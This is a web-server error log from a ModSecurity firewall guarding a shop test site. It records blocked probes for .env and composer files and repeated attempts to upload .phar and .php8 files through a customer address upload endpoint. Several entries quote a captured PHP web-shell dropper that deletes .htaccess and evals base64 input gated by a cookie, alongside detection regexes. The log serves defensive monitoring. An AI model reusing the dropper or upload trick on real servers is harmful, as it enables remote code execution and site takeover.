[Tue Feb 17 17:19:19.570368 2026] [:error] [pid 2139726] [client 194.110.207.62:43394] [client 194.110.207.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aZSVB8cgI00pQY9tm9s8qAAAAAQ"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/b/t/bt88364f428d25.phar
[Tue Feb 17 17:19:19.570638 2026] [:error] [pid 2139726] [client 194.110.207.62:43394] [client 194.110.207.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aZSVB8cgI00pQY9tm9s8qAAAAAQ"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/b/t/bt88364f428d25.phar
[Tue Feb 17 17:19:19.854122 2026] [:error] [pid 2139726] [client 194.110.207.62:43394] [client 194.110.207.62] ModSecurity: Rule 7fc810f2cbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/b/t/bt88364f428d25.php8"] [unique_id "aZSVB8cgI00pQY9tm9s8qQAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 17 17:19:19.854635 2026] [:error] [pid 2139726] [client 194.110.207.62:43394] [client 194.110.207.62] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/b/t/bt88364f428d25.php8"] [unique_id "aZSVB8cgI00pQY9tm9s8qQAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 17 17:19:19.857141 2026] [:error] [pid 2139726] [client 194.110.207.62:43394] [client 194.110.207.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/b/t/bt88364f428d25.php8"] [unique_id "aZSVB8cgI00pQY9tm9s8qQAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 17 17:19:19.857347 2026] [:error] [pid 2139726] [client 194.110.207.62:43394] [client 194.110.207.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/b/t/bt88364f428d25.php8"] [unique_id "aZSVB8cgI00pQY9tm9s8qQAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Feb 18 02:04:59.676715 2026] [:error] [pid 2158805] [client 46.191.138.29:43447] [client 46.191.138.29] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /composer.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/composer.json"] [unique_id "aZUQO7nhCbuv4XcfdZGBlwAAAAE"]
[Wed Feb 18 02:04:59.677115 2026] [:error] [pid 2158805] [client 46.191.138.29:43447] [client 46.191.138.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/composer.json"] [unique_id "aZUQO7nhCbuv4XcfdZGBlwAAAAE"]
[Wed Feb 18 02:04:59.677358 2026] [:error] [pid 2158805] [client 46.191.138.29:43447] [client 46.191.138.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/composer.json"] [unique_id "aZUQO7nhCbuv4XcfdZGBlwAAAAE"]
[Wed Feb 18 02:04:59.889965 2026] [:error] [pid 2158821] [client 46.191.138.29:41189] [client 46.191.138.29] ModSecurity: Warning. Matched phrase "/composer.lock" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.lock found within REQUEST_FILENAME: /composer.lock"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/composer.lock"] [unique_id "aZUQO-lWiqWVRV3wvdJXugAAAAU"]
[Wed Feb 18 02:04:59.890209 2026] [:error] [pid 2158821] [client 46.191.138.29:41189] [client 46.191.138.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/composer.lock"] [unique_id "aZUQO-lWiqWVRV3wvdJXugAAAAU"]
[Wed Feb 18 02:04:59.890394 2026] [:error] [pid 2158821] [client 46.191.138.29:41189] [client 46.191.138.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/composer.lock"] [unique_id "aZUQO-lWiqWVRV3wvdJXugAAAAU"]
[Wed Feb 18 02:05:00.101047 2026] [:error] [pid 2159993] [client 46.191.138.29:43485] [client 46.191.138.29] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /.composer/composer.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.composer/composer.json"] [unique_id "aZUQPGhJ6Xhv1lP5CLKCwwAAAAY"]
[Wed Feb 18 02:05:00.101308 2026] [:error] [pid 2159993] [client 46.191.138.29:43485] [client 46.191.138.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.composer/composer.json"] [unique_id "aZUQPGhJ6Xhv1lP5CLKCwwAAAAY"]
[Wed Feb 18 02:05:00.101490 2026] [:error] [pid 2159993] [client 46.191.138.29:43485] [client 46.191.138.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.composer/composer.json"] [unique_id "aZUQPGhJ6Xhv1lP5CLKCwwAAAAY"]
[Wed Feb 18 02:05:00.319386 2026] [authz_core:error] [pid 2158808] [client 46.191.138.29:9800] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/composer/installed.json
[Wed Feb 18 14:43:35.554012 2026] [:error] [pid 2167596] [client 194.110.207.62:38846] [client 194.110.207.62] ModSecurity: Rule 7f55acb6bbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/7/l/7l88364f428d25.phar"] [unique_id "aZXCBwNfOk4fQtXkBoshDQAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Feb 18 14:43:35.554593 2026] [:error] [pid 2167596] [client 194.110.207.62:38846] [client 194.110.207.62] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/7/l/7l88364f428d25.phar"] [unique_id "aZXCBwNfOk4fQtXkBoshDQAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Feb 18 14:43:35.557068 2026] [:error] [pid 2167596] [client 194.110.207.62:38846] [client 194.110.207.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/7/l/7l88364f428d25.phar"] [unique_id "aZXCBwNfOk4fQtXkBoshDQAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Feb 18 14:43:35.557259 2026] [:error] [pid 2167596] [client 194.110.207.62:38846] [client 194.110.207.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/7/l/7l88364f428d25.phar"] [unique_id "aZXCBwNfOk4fQtXkBoshDQAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Feb 18 14:43:35.732869 2026] [:error] [pid 2167596] [client 194.110.207.62:38846] [client 194.110.207.62] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: 7l88364f428d25.php8 found within FILES:custom_attributes[country_id]: 7l88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aZXCBwNfOk4fQtXkBoshDgAAAAk"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/7/l/7l88364f428d25.phar
[Wed Feb 18 14:43:35.733530 2026] [:error] [pid 2167596] [client 194.110.207.62:38846] [client 194.110.207.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aZXCBwNfOk4fQtXkBoshDgAAAAk"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/7/l/7l88364f428d25.phar
[Wed Feb 18 14:43:35.733718 2026] [:error] [pid 2167596] [client 194.110.207.62:38846] [client 194.110.207.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aZXCBwNfOk4fQtXkBoshDgAAAAk"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/7/l/7l88364f428d25.phar
[Wed Feb 18 14:43:35.844801 2026] [:error] [pid 2167596] [client 194.110.207.62:38846] [client 194.110.207.62] ModSecurity: Rule 7f55acb6bbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/7/l/7l88364f428d25.php8"] [unique_id "aZXCBwNfOk4fQtXkBoshDwAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Feb 18 14:43:35.845281 2026] [:error] [pid 2167596] [client 194.110.207.62:38846] [client 194.110.207.62] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/7/l/7l88364f428d25.php8"] [unique_id "aZXCBwNfOk4fQtXkBoshDwAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Feb 18 14:43:35.847800 2026] [:error] [pid 2167596] [client 194.110.207.62:38846] [client 194.110.207.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/7/l/7l88364f428d25.php8"] [unique_id "aZXCBwNfOk4fQtXkBoshDwAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Feb 18 14:43:35.847998 2026] [:error] [pid 2167596] [client 194.110.207.62:38846] [client 194.110.207.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/7/l/7l88364f428d25.php8"] [unique_id "aZXCBwNfOk4fQtXkBoshDwAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Feb 19 05:48:08.579184 2026] [:error] [pid 2182754] [client 185.93.89.110:51052] [client 185.93.89.110] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aZaWCPG93u2nL09p_e3mTAAAAAE"]
[Thu Feb 19 05:48:08.579422 2026] [:error] [pid 2182754] [client 185.93.89.110:51052] [client 185.93.89.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aZaWCPG93u2nL09p_e3mTAAAAAE"]
[Thu Feb 19 05:48:08.579579 2026] [:error] [pid 2182754] [client 185.93.89.110:51052] [client 185.93.89.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aZaWCPG93u2nL09p_e3mTAAAAAE"]
[Thu Feb 19 09:27:27.845663 2026] [:error] [pid 2182757] [client 176.195.127.156:46822] [client 176.195.127.156] ModSecurity: Rule 7f633eaadbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/6/m/6m88364f428d25.phar"] [unique_id "aZbJb5Xnj_nGDg6GJORR7gAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Feb 19 09:27:27.846191 2026] [:error] [pid 2182757] [client 176.195.127.156:46822] [client 176.195.127.156] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/6/m/6m88364f428d25.phar"] [unique_id "aZbJb5Xnj_nGDg6GJORR7gAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Feb 19 09:27:27.848777 2026] [:error] [pid 2182757] [client 176.195.127.156:46822] [client 176.195.127.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/6/m/6m88364f428d25.phar"] [unique_id "aZbJb5Xnj_nGDg6GJORR7gAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Feb 19 09:27:27.849051 2026] [:error] [pid 2182757] [client 176.195.127.156:46822] [client 176.195.127.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/6/m/6m88364f428d25.phar"] [unique_id "aZbJb5Xnj_nGDg6GJORR7gAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Feb 19 09:27:28.028241 2026] [:error] [pid 2182757] [client 176.195.127.156:46822] [client 176.195.127.156] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: 6m88364f428d25.php8 found within FILES:custom_attributes[country_id]: 6m88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aZbJcJXnj_nGDg6GJORR7wAAAAQ"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/6/m/6m88364f428d25.phar
